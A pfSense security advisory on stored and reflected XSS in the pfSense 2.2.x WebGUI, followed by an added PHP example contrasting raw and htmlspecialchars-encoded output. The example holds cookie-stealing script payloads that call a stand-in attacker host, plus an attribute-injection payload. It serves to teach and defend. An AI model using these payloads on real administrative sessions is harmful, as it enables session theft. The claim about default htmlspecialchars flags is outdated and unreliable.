-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

=============================================================================
pfSense-SA-16_02.webgui                                   Security Advisory
                                                                    pfSense

Topic:          Multiple XSS and CSRF Vulnerabilities in the pfSense WebGUI

Category:       pfSense Base System
Module:         webgui
Announced:      2016-04-01
Credits:        Francesco Oddo - Security-Assessment.com
Affects:        pfSense < 2.3
Corrected:      2016-02-10 18:29:12 UTC (pfsense/RELENG_2_2, pfSense 2.2.x)

0.   Revision History

     v1.0  2016-04-01 Initial release

I.   Background

The pfSense® system is a free network firewall distribution based on the
FreeBSD operating system. The pfSense system includes third-party free
software packages for additional functionality, and provides most of the
functionality of common commercial firewalls.

The majority of users of pfSense software have never installed or used a
stock FreeBSD system. Unlike similar GNU/Linux-based firewall distributions,
there is no need for any UNIX knowledge. The command line is never used, and
there is no need to ever manually edit any rule sets. Instead, pfSense
software includes a web interface for the configuration of all included
components. Users familiar with commercial firewalls will quickly understand
the web interface, while those unfamiliar with commercial-grade firewalls may
encounter a short learning curve.

II.  Problem Description

Multiple Cross-Site Scripting (XSS) vulnerabilities were found in the pfSense
WebGUI on pfSense 2.2.6 and earlier versions.

On system_gateway_groups_edit.php, a gateway Description ("descr") was being
printed without encoding, leading to a potential stored XSS.

Multiple limiter parameters referenced on firewall_shaper_vinterface.php on
pfSense 2.2.6 and earlier were printed without encoding when rejected by
input validation, leading to a reflected XSS. The redesigned GUI used on
pfSense 2.3 is not affected.
The "container" parameter referenced on firewall_shaper_layer7.php on pfSense
2.2.6 and earlier was printed without encoding when rejected by input
validation, leading to a reflected XSS. The Layer 7 feature is deprecated and
had already been removed from the master branch (2.3), thus it is not
affected.

III. Impact

Due to the lack of proper encoding on the affected variables and pages,
arbitrary JavaScript can be executed in the user's browser in the context of
the WebGUI session. The user's session cookie or other information from the
session may be compromised.

IV.  Workaround

Upgrade to pfSense 2.3 or later, which includes fixes for these issues.

To mitigate the problem on older releases, use one or more of the following:

 * Limit access to the affected pages to trusted administrators only.
 * Do not log into the firewall with the same browser used for
   non-administrative web browsing.

V.   Solution

Upgrade to pfSense 2.3. This may be performed in the web interface or from
the console. See https://doc.pfsense.org/index.php/Upgrade_Guide

VI.  Correction details

The following list contains the correction revision numbers for each
affected item.

Branch/path                                                      Revision
- -------------------------------------------------------------------------
pfSense/RELENG_2_2                       08fb986ee6fcc2fd5ec24d3d22c67e76457a958f
                                         b76fd2a05664379c6752c5ee28c42462348d5d51
- -------------------------------------------------------------------------

VII. References

None.
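The bug class behind sections II and III is output without encoding, in two shapes: a value rejected by input validation and echoed back in the error message (reflected, the limiter and "container" cases) and a saved configuration value printed into the page (stored, the gateway Description case). The following PHP is an added illustration written for this page, not pfSense's own source: the function names, the hypothetical `bandwidth` limiter parameter, the `attacker.invalid` host and the sample payloads are constructed for the example.

```php
<?php
// Added example, not pfSense code. Shows the reflected-XSS pattern from the
// advisory (a rejected parameter echoed back raw) beside the encoded form,
// plus the stored variant for a configuration value printed into the page.

// Constructed sample request: the attacker-controlled value sits in a query
// parameter of a link the administrator is lured into opening while logged in.
$request = [
    'bandwidth' => '<script>document.location="http://attacker.invalid/?c="+document.cookie</script>',
];

// Hypothetical validator: a limiter bandwidth must be a plain integer.
// \A and \z avoid the trailing-newline match that $ permits in PCRE.
function validate_bandwidth(string $value): ?string {
    if (!preg_match('/\A[0-9]+\z/', $value)) {
        // The rejected value is copied into the error text unchanged; that is
        // fine for a log, but not for HTML unless it is encoded at output.
        return "The bandwidth value '$value' is not a valid number.";
    }
    return null;
}

// Vulnerable rendering: the error string, still containing the raw input, is
// concatenated straight into the HTML body, so the <script> element is parsed
// and executed in the WebGUI session.
function render_errors_vulnerable(array $errors): string {
    $out = '<ul class="errors">';
    foreach ($errors as $e) {
        $out .= '<li>' . $e . '</li>';
    }
    return $out . '</ul>';
}

// Hardened rendering: each error string goes through htmlspecialchars() with
// ENT_QUOTES, so <, >, &, " and ' become entities and the browser shows the
// payload as text. Encoding happens at the output sink, not in the validator,
// so the same message can still be logged or stored in its original form.
function render_errors_fixed(array $errors): string {
    $out = '<ul class="errors">';
    foreach ($errors as $e) {
        $out .= '<li>' . htmlspecialchars($e, ENT_QUOTES | ENT_HTML5, 'UTF-8') . '</li>';
    }
    return $out . '</ul>';
}

// Stored variant: the value comes from saved configuration rather than the
// request, but the same encoding rule applies. Here the sink is an attribute
// value, which is why ENT_QUOTES (encoding " and ') matters: a bare
// htmlspecialchars() call with default flags leaves single quotes intact.
$stored_descr = '" autofocus onfocus="alert(document.cookie)';

function description_input_vulnerable(string $descr): string {
    return '<input type="text" name="descr" value="' . $descr . '">';
}

function description_input_fixed(string $descr): string {
    return '<input type="text" name="descr" value="'
        . htmlspecialchars($descr, ENT_QUOTES | ENT_HTML5, 'UTF-8') . '">';
}

$errors = [];
if (($err = validate_bandwidth($request['bandwidth'])) !== null) {
    $errors[] = $err;
}

echo "Reflected, vulnerable:\n" . render_errors_vulnerable($errors) . "\n\n";
echo "Reflected, fixed:\n" . render_errors_fixed($errors) . "\n\n";
echo "Stored, vulnerable:\n" . description_input_vulnerable($stored_descr) . "\n\n";
echo "Stored, fixed:\n" . description_input_fixed($stored_descr) . "\n";
```

Run it with `php example.php` and compare the four outputs: in the vulnerable forms the payload survives as markup, in the fixed forms it survives only as entity-encoded text. The second workaround in section IV (a separate browser for administration) follows from the reflected case: the payload only runs if the link is opened by a browser that already holds a WebGUI session cookie.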
The latest revision of this advisory is available at

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1

iQIcBAEBAgAGBQJXC+VVAAoJEBO5h/2SFPjajWcP/RrfZMmxVwScR9Wnn9AYl8hm
vb+na+GOBa0uG6b4OVOtlP157cyEz5I++VZvDO9Ze5zCZi09JTGzmZKUUeEMgB0r
YQxjmtlQ7jhcUIiQmoUgBz0Gecq9gTA11z6rw9yma+XzEV5cpqXTFaYu359I7e8b
VRPgjeB1cZfJUo0PcnwnnySR9G2nUma0lJlragjFNFNl1ka2SaN10+IzY2oMy7Wm
4MWO2H79y/xm1mkX9xFJoeKwGAHcEjDLM0q1pn8XLMobvw5wp7rA7lj7PHELS7E1
voQfyoIP/f7h917BcnpIvG2dXRhZlCBaszeELvN0ft4chSwuQ4xkIVew492SXOpR
DEMPRV40k6AJ0pBaxcb0Blm87G77voGgRN2sRVPgAlzZO/6VrMTcpXqvNtLbYJqB
j3jVhWWEB3DKTdmbYvFQJ1TQgwGDzgKr7DkDEPUWs+Rj6iEBksg0UWJj3EGGU6x7
mT61AptcgJ5Xe82d/DCl/OiNe3wmXcHGObMGRi+7jRvDI+uJv6qMIz3zEcPzuazS
20AGoopB5otI/hmL139ap9OudeGSmCb/599atmRnPgLBHZDfDCVe7K/+eOjqZXNF
bDu4Rb+1jt6tx03tvA/dt+pUdRobFMpoW8C4fStV/sRIvl5s3Vur6CuwzYCLJvcI
2a7+pzRiWdOERbmr7i85
=r7MV
-----END PGP SIGNATURE-----